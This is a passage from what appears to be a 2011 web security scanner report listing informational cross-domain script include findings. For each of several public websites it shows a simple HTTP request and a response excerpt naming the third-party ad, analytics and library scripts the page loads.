<!DOCTYPE html>
<!-- tid: 105; lct: Wed Mar 23 15:40:16 2011 -->
<!--[if IE ]><![endif]-->
<html>
<head><title>The page you requested was not found | The Business Journals</title>
<base href="http://w
...[SNIP]...
</script>
<script src="http://api.bizographics.com/v1/profile.json?callback=load_ad&api_key=4db4d30f3e4d4a7caa0d94f4d1bb1dee" type="text/javascript"></script>
...[SNIP]...
<!-- Begin DFP Block -->
<script type="text/javascript" src="http://ad.doubleclick.net/adj/bzj.bizjournals/;dcopt=ist;tile=6;pos=wel;kw=bizjournals;sz=1x1;ord=1301751544.8146.3.17464?" target="_blank"></script>
...[SNIP]...
<!-- Begin DFP Block -->
<script type="text/javascript" src="http://ad.doubleclick.net/adj/bzj.bizjournals/;kw=bizjournals;pos=pub;am=0;sz=120x60;ord=1301751544.8146.3.17464?" target="_blank"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://tcr.tynt.com/javascripts/Tracer.js?user=ddElwcoZ0r37YtadbiUzgI&amp;amp;s=151&amp;amp;su=0&amp;amp;st=1&amp;amp;lang=en"></script>
<script type="text/javascript" src="http://js.bizographics.com/convert_data.js?partner_id=447"></script>
<script type="text/javascript" src="http://ps1.inflectionpointmedia.com/track?t=url-track&amp;pid=ACBJ"></script>
...[SNIP]...

20.10. http://www.blogs.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blogs.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.blogs.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 14:07:11 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <meta http-
...[SNIP]...
<div id="leaderboard-250"><script src="http://ads.sixapart.com/custom?id=6a.blogscom/soc.all.ros/other/225x90&js=1"></script>
...[SNIP]...
<div id="leaderboard-728"><script src="http://ads.sixapart.com/custom?id=6a.blogscom/soc.all.ros/other/728x90&js=1"></script>
...[SNIP]...
<div id="sidebar-300"><script src="http://ads.sixapart.com/custom?id=6a.blogscom/soc.all.ros/other/300x250&js=1"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>


   <script type="text/javascript" src="http://profile.typepad.com/services/embed/tpc/6a01053611bc14970c010536098bcd970b/counts_embed.js"></script>


<script src="http://cdn.media6degrees.com/static/sa1103.js" type="text/javascript"></script>
...[SNIP]...

20.11. http://www.bullishbankers.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bullishbankers.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bullishbankers.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:06:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.15
Set-Cookie: PHPSESSID=a70ecd980c5c9f83309c1b6e14b4625a; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: mtaShowAfter=deleted; expires=Fri, 02-Apr-2010 14:06:41 GMT; path=/
Set-Cookie: mtaVisits=1; expires=Sun, 01-Apr-2012 14:06:42 GMT; path=/
X-Pingback: http://www.bullishbankers.com/xmlrpc.php
Last-Modified: Sat, 02 Apr 2011 14:06:42 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44910

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">


<head profile="ht
...[SNIP]...
<link rel="stylesheet" href="http://www.bullishbankers.com/wp-content/plugins/sociable/sociable.css" type="text/css" media="screen" charset="utf-8"/>
                       <script type='text/javascript' src='http://plugins.wikinvest.com/plugin/javascript/relatedContent/scripts.php'></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://www.statcounter.com/counter/counter_xhtml.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://analytics.aweber.com/js/awt_analytics.js?id=7PLa"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

20.12. http://www.canon.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.canon.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.canon.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:59:10 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 8501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" >
<head>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=canonglobal"></script>
...[SNIP]...

20.13. http://www.citibank.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citibank.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.citibank.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not found
Server: ""
Date: Sat, 02 Apr 2011 13:35:26 GMT
Content-type: text/html
Connection: close
Content-Length: 14811

<HTML>
<HEAD>
   <style>
   <!--
       body {
           background: #fff;
       }
       .notextdecor{
           COLOR: #000099;
           TEXT-DECORATION: none;
       }
       TD{
           COLOR: #000000;
           FONT-FAMILY: verdana, arial, helvetica, sans
...[SNIP]...
</script>
   <script type="text/javascript" language="javascript" src="http://www.citi.com/domain/scripts/country.js"></script>
   <script type="text/javascript" language="javascript" src="http://www.citi.com/domain/scripts/config.js"></script>
...[SNIP]...

20.14. http://www.collegehumor.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.collegehumor.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.collegehumor.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 13:35:37 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: returning_user=deleted; expires=Fri, 02-Apr-2010 13:35:36 GMT; path=/; domain=.collegehumor.com
Set-Cookie: returning_user=1; expires=Mon, 02-May-2011 13:35:37 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=deleted; expires=Fri, 02-Apr-2010 13:35:36 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=2aaaf6d3dd05b89fe9a91fb542a542bf37833c97; expires=Fri, 01-Apr-2016 18:39:27 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=2aaaf6d3dd05b89fe9a91fb542a542bf37833c97; expires=Fri, 01-Apr-2016 18:39:27 GMT; path=/; domain=.collegehumor.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.fa
...[SNIP]...
<!-- Start Quantcast tag -->
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- re-targeting tracking -->
<script type="text/javascript" defer="defer" src="http://tap-cdn.rubiconproject.com/partner/scripts/rubicon/alice.js?pc=3439/3658"></script>
...[SNIP]...

20.15. http://www.curse.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.curse.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.curse.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Set-Cookie: BIGipServer=1949253700.20480.0000; path=/
Cache-Control: no-cache,private
Content-Length: 23341
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
CommunityServer: 4.0.30619.63
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:39:41 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

20.16. http://www.dealer.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dealer.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dealer.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 19895
Vary: Accept-Encoding
Date: Sat, 02 Apr 2011 14:16:53 GMT
Connection: close
Set-Cookie: exp_last_visit=986393813; expires=Sun, 01-Apr-2012 14:16:53 GMT; path=/
Set-Cookie: exp_last_activity=1301753813; expires=Sun, 01-Apr-2012 14:16:53 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<![endif]-->
   <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.mkt51.net/lp/static/js/iMAWebCookie.js?7e29f616-12c999824aa-c6f842ded9e6d11c5ffebd715e129037&h=www.pages05.net"></script>
...[SNIP]...

20.17. http://www.dexknows.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dexknows.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dexknows.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Cache-Control: private, max-age=31536000
Date: Sat, 02 Apr 2011 13:45:32 GMT
Content-Length: 24377
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

...[SNIP]...
</script>

<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">

</script>
...[SNIP]...

20.18. http://www.ebayclassifieds.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebayclassifieds.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ebayclassifieds.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private=Set-Cookie
Set-Cookie: p=""; Domain=ebayclassifieds.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Sat, 02 Apr 2011 13:39:11 GMT
Content-Length: 20374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>favicon ico | favicon ico on eBay Classifieds</title>
<meta http-e
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://polaris.classistatic.com/static/1103291517/js/polaris.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</li>
           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=polaris2009"></script>
...[SNIP]...
<!-- footer -->
<script type="text/javascript" src="http://www.google-analytics.com/ga.js"></script>
...[SNIP]...
<!-- /id="ui-body" -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://polaris.classistatic.com/static/1103291517/js/headerGreeting.js"></script>
<script type="text/javascript" language="JavaScript" src="http://polaris.classistatic.com/static/1103291517/js/jquery.core.js"></script>
<script type="text/javascript" language="JavaScript" src="http://polaris.classistatic.com/static/1103291517/js/jquery.jstore-all.js"></script>
<script type="text/javascript" language="JavaScript" src="http://polaris.classistatic.com/static/1103291517/js/ui/jquery.ui.core.js"></script>
<script type="text/javascript" language="JavaScript" src="http://polaris.classistatic.com/static/1103291517/js/ui/jquery.ui.position.js"></script>
<script type="text/javascript" language="JavaScript" src="http://polaris.classistatic.com/static/1103291517/js/ui/jquery.ui.widget.js"></script>
<script type="text/javascript" language="JavaScript" src="http://polaris.classistatic.com/static/1103291517/js/ui/jquery.ui.autocomplete.js"></script>
<script type="text/javascript" language="JavaScript" src="http://polaris.classistatic.com/static/1103291517/js/geo.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://connect.facebook.net/en_US/all.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://tcr.tynt.com/javascripts/Tracer.js?user=dTUSEadYur3Oy6acn9QLxW&amp;s=41"></script>
...[SNIP]...

20.19. http://www.elyricsworld.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.elyricsworld.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.elyricsworld.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 20:22:02 GMT
Server: Apache/2.2.17 (Unix) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 1321
Content-Type: text/html

<html>
   <head>
       <title>/favicon.ico not found on elyricsworld.com</title>
       <meta name="robots" content="noindex">
<style type="text/css">
body
{
   font-size: 12px;
   color: #000000;
   font-f
...[SNIP]...
</script>
<script type="text/javascript"
src="http://linkhelp.clients.google.com/tbproxy/lh/wm/fixurl.js">
</script>
...[SNIP]...

20.20. http://www.freeridegames.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freeridegames.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.freeridegames.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:08 GMT
Server: Apache
Set-Cookie: JSESSIONID=454706C5579DD4BBE9DEF3994E49D6C7; Path=/
Set-Cookie: 143_userName=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: 143_password=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: 143_TURNKEY=Default-551301751188525286; Expires=Sun, 01-Apr-2012 13:33:08 GMT; Path=/
Set-Cookie: 143_CAMPAIGN_SERIAL_ID=Default-Default; Expires=Fri, 01-Jul-2011 13:33:08 GMT; Path=/
Set-Cookie: 143_FIRST_BROWSER="Default-MSIE 7.0"; Version=1; Max-Age=7776000; Expires=Fri, 01-Jul-2011 13:33:08 GMT; Path=/
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Accept-Ranges: bytes
ETag: W/"60157-1301309068734"
Last-Modified: Mon, 28 Mar 2011 10:44:28 GMT
Content-Length: 60157
Content-Type: text/html

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free Games - D
...[SNIP]...
</div>
               <script type="text/javascript" src="http://apps.conduit-banners.com/FreeRideGames-Great_Games?appid=143ada62-5cdf-4856-a621-0bfe11a6e5b1&script=togo&type=1"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="//secure.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- BEGIN TRIGGER TAG -->
   <script language="java_script" type="text/javascript" src="http://cdn.triggertag.gorillanation.com/js/triggertag.js"></script>
...[SNIP]...

20.21. http://www.games.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.games.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.games.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 /http:/o.aolcdn.com/os/games/images/favicon.ico
Date: Sat, 02 Apr 2011 13:31:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html
Content-Length: 316518

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- dpm-lm236 -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpr
...[SNIP]...
<!-- Set Merge URL-->
<script type="text/javascript" src="http://o.aolcdn.com/os_merge/?file=/games/scripts/jquery.min.js&amp;file=/games/scripts/default.min.js&amp;file=/aol/jquery.getjs-1.0.min.js&amp;file=/header/js/jquery.globalheader-1.3.js&amp;file=/header/js/jquery.globalsearchbox-1.3.js"></script>
<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
<!-- BEGIN: Global Games HeadAppend -->

<script type="text/javascript" src="http://o.aolcdn.com/os/games/scripts/default.min.js"></script>
...[SNIP]...
<!-- BEGIN: FEEDBACK LINK JS -->
<script type="text/javascript" src="http://o.aolcdn.com/feedback/feedback1.js"></script>
...[SNIP]...
<!-- END: Global Games FootAppend --><script src="http://o.aolcdn.com/os_merge/?file=/aol/jquery.sonar.min.js&amp;file=/aol/jquery.facebooksocial.min.js&amp;file=/aol/jquery.inlinecss-1.0.min.js&amp;file=/aol/jquery.openwindow.min.js&amp;file=/aol/jquery.aolshare.min.js&amp;file=/aol/jquery.aolshare.min.js" type="text/javascript"></script>
...[SNIP]...

20.22. http://www.guitarcenter.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.guitarcenter.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.guitarcenter.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:14:52 GMT
Server: Microsoft-IIS/6.0
ETag:
SN: 28
X-Powered-By: ASP.NET
Set-Cookie: ASP.NET_SessionId=cfhhpohbyrkjmlcxvhr5mdrd; path=/; HttpOnly
Set-Cookie: ref=; path=/
Set-Cookie: ref_d=4/2/2011 10:14:51 AM; path=/
Set-Cookie: source=; path=/
Set-Cookie: ad_id=; path=/
Set-Cookie: orig_ref=; expires=Sat, 16-Apr-2011 14:14:51 GMT; path=/
Set-Cookie: orig_ref_d=4/2/2011 10:14:51 AM; expires=Sat, 16-Apr-2011 14:14:51 GMT; path=/
Set-Cookie: orig_source=; expires=Sat, 16-Apr-2011 14:14:51 GMT; path=/
Set-Cookie: orig_ad_id=; expires=Sat, 16-Apr-2011 14:14:51 GMT; path=/
Set-Cookie: uid=36efd3e4-9a5c-4120-8cc5-e6a569099115; expires=Mon, 02-May-2011 14:14:51 GMT; path=/
Set-Cookie: IsLoyaltyAvailable=False; expires=Mon, 02-May-2011 14:14:52 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 65425


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__htmHead"><s
...[SNIP]...
<!-- NEW FOR HISTORY BLOCK -->
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js" type="text/javascript"></script>
...[SNIP]...

20.23. http://www.hayneedle.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hayneedle.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hayneedle.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 No Content
Date: Sat, 02 Apr 2011 14:13:19 GMT
Server: Apache
Set-Cookie: SITE_ID=669;domain=.hayneedle.com;path=/
Set-Cookie: GLOBALBRANDTABDISPLAYFLAG=1;domain=.hayneedle.com;expires=Mon, 25-Mar-2041 14:13:19 GMT;path=/
Set-Cookie: CFID=1845783;expires=Mon, 25-Mar-2041 14:13:19 GMT;path=/
Set-Cookie: CFTOKEN=18555418;expires=Mon, 25-Mar-2041 14:13:19 GMT;path=/
Set-Cookie: SID=168F9556%2DAFAA%2DD69D%2DBF662349017993E3;domain=.hayneedle.com;path=/
Set-Cookie: BRAND_SID=168F9564%2DBCFC%2D2008%2DF545EEB98C2F515F;domain=.hayneedle.com;path=/
Set-Cookie: GLOBAL_SID=168F9572%2DFF8F%2D4773%2D011E87EA6323CAED;domain=.hayneedle.com;expires=Mon, 25-Mar-2041 14:13:19 GMT;path=/
Set-Cookie: SITE_ID=669;path=/
Set-Cookie: GEO_DATA=%3CwddxPacket%20version%3D%271%2E0%27%3E%3Cheader%2F%3E%3Cdata%3E%3Cstruct%3E%3Cvar%20name%3D%27POSTAL%5FCODE%27%3E%3Cstring%3E05672%3C%2Fstring%3E%3C%2Fvar%3E%3C%2Fstruct%3E%3C%2Fdata%3E%3C%2FwddxPacket%3E;path=/
Set-Cookie: SURVEYS=309%7C%7Bts%20%272011%2D04%2D02%2009%3A13%3A19%27%7D%7C0%7C0;expires=Mon, 25-Mar-2041 14:13:19 GMT;path=/
Set-Cookie: SESSION_COUNTER=4310204;path=/
Set-Cookie: SIGNATURE=MWP5GCRJ3nTSpdoEL7gF10r6POmFuHsBTEquPge%2BNls2sE5V2f2bPn6ywNvybK6A;domain=.hayneedle.com;path=/
Set-Cookie: GLOBAL_CUSTOMER_ACCOUNT=%3CwddxPacket%20version%3D%271%2E0%27%3E%3Cheader%2F%3E%3Cdata%3E%3Cstruct%3E%3Cvar%20name%3D%27CUSTOMER%5FID%27%3E%3Cstring%3E0%3C%2Fstring%3E%3C%2Fvar%3E%3Cvar%20name%3D%27CUSTOMER%5FFIRST%5FNAME%27%3E%3Cstring%3E%3C%2Fstring%3E%3C%2Fvar%3E%3Cvar%20name%3D%27SIGNED%5FIN%27%3E%3Cstring%3E%3C%2Fstring%3E%3C%2Fvar%3E%3C%2Fstruct%3E%3C%2Fdata%3E%3C%2FwddxPacket%3E;domain=.hayneedle.com;path=/
Set-Cookie: SKU_COMPARE=;domain=.hayneedle.com;expires=Mon, 25-Mar-2041 14:13:19 GMT;path=/
Set-Cookie: INITIAL_SESSION_LOGGED=1;domain=.hayneedle.com;path=/
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 22867

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
...[SNIP]...
</div>
   
       <script src="http://connect.facebook.net/en_US/all.js"></script>
...[SNIP]...

20.24. http://www.iloveindia.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iloveindia.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.iloveindia.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:56:57 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.9
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 23719

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<HTML>

<HEAD>
<TITLE>Page not found - iloveindia.com</TITLE>

<LINK HREF="/homestyle.css" TYPE="text/css" REL="STYLESHEET
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_011615198091901542997%3Avgbx0sws0my&lang=en"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_011615198091901542997%3Avgbx0sws0my&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

20.25. http://www.kcom.com/contact-us/brighton

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kcom.com
Path:   /contact-us/brighton

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /contact-us/brighton HTTP/1.1
Host: www.kcom.com
Proxy-Connection: keep-alive
Referer: http://www.kcom.com/contact-us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=986389016; __utmz=90957184.1301752662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); exp_last_activity=1301749029; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fcontact-us%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=90957184.848604376.1301752662.1301752662.1301752662.1; __utmc=90957184; __utmb=90957184.4.9.1301752673281

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:20 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1301749040; expires=Sun, 01-Apr-2012 13:57:20 GMT; path=/
